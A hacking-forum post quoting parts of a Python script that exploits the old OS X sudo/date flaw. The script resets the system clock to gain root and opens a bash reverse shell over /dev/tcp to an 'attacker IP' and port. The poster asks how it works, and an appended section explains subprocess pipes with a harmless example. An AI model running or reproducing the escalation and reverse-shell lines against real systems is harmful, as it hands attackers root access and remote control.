I will scream at the next person who tells me Macs are secure! 10-20-2013, 01:10 AM
#13
(10-20-2013, 12:49 AM)3SidedSquare Wrote:
Ok, from python documentation for 3.2.2:
Code:
#!/usr/bin/python
##Various comments##
import subprocess
# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"
# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"
# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
and
Code:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.
So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.
Code:
If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None.
If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None.
If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.
First, what's with the date? Is it really necessary to -setdate 01:01:1970?
Code:
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
##More various junk###
Second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help?
Quote:
About five months ago, a bug was discovered on using the Date & Time settings within OSX 10.8.4 and below to perform a local privilege escalation from a normal user to root. The original flaw was a bug in Unix and sudo and allows the execution of changing the date and time to escalate to root permissions from a normal user. The flaw was recently put into the Metasploit Framework by Todd Miller (original bug discovery), Joev (wrote the module), and Juan Vazquez (bug testing and module fixing).
#MakeSinisterlySexyAgain
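The post above asks what `subprocess.Popen` actually does when `stdin`, `stdout` and `stderr` are all set to `PIPE`. The following is an added example, not code from the quoted post or from the Python documentation, that answers only that question with a harmless child process (`cat`, and a `sh -c` one-liner to show that stderr is captured separately). The helper name `run_through_pipes` and the sample input lines are constructed for this example. It uses `universal_newlines=True`, which is the Python 3.2 spelling of text mode; without it the pipe file objects are byte streams and `stdin.write()` requires `bytes`, not `str`.

```python
import subprocess


def run_through_pipes(command, lines):
    """Start `command` as a list (so shell=False: no shell parsing of the
    arguments), feed it the given text lines on stdin, and return a tuple
    (stdout, stderr, returncode) once the child exits.

    With stdin=PIPE the parent writes into proc.stdin; with stdout=PIPE and
    stderr=PIPE the parent reads proc.stdout and proc.stderr.  communicate()
    does all three at once and avoids the deadlock you can get by writing a
    large input and only then reading the output.
    """
    proc = subprocess.Popen(
        command,
        shell=False,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=True,  # text mode: str in, str out (pipes are bytes by default)
    )
    # Each line gets a trailing newline, exactly as if typed at a prompt.
    stdin_text = "".join(line + "\n" for line in lines)
    out, err = proc.communicate(stdin_text)  # sends input, closes stdin, reads to EOF
    return out, err, proc.returncode


def demo():
    # Constructed sample input for the example; `cat` simply echoes it back.
    echoed = run_through_pipes(["cat"], ["alpha", "beta"])
    # A child that writes to both streams shows stdout and stderr are kept apart.
    split = run_through_pipes(["sh", "-c", "cat; echo warn 1>&2"], ["gamma"])
    return echoed, split


if __name__ == "__main__":
    for result in demo():
        print("stdout=%r stderr=%r rc=%d" % result)
```

Running the block prints `stdout='alpha\nbeta\n' stderr='' rc=0` for the `cat` case and `stdout='gamma\n' stderr='warn\n' rc=0` for the second; the point for the reader of the post is that nothing the child writes appears on the parent's terminal, it only lands in the pipe objects, and that a `str` argument to `Popen` with `shell=False` is treated as a bare program name, which is why `Popen('bash')` works at all.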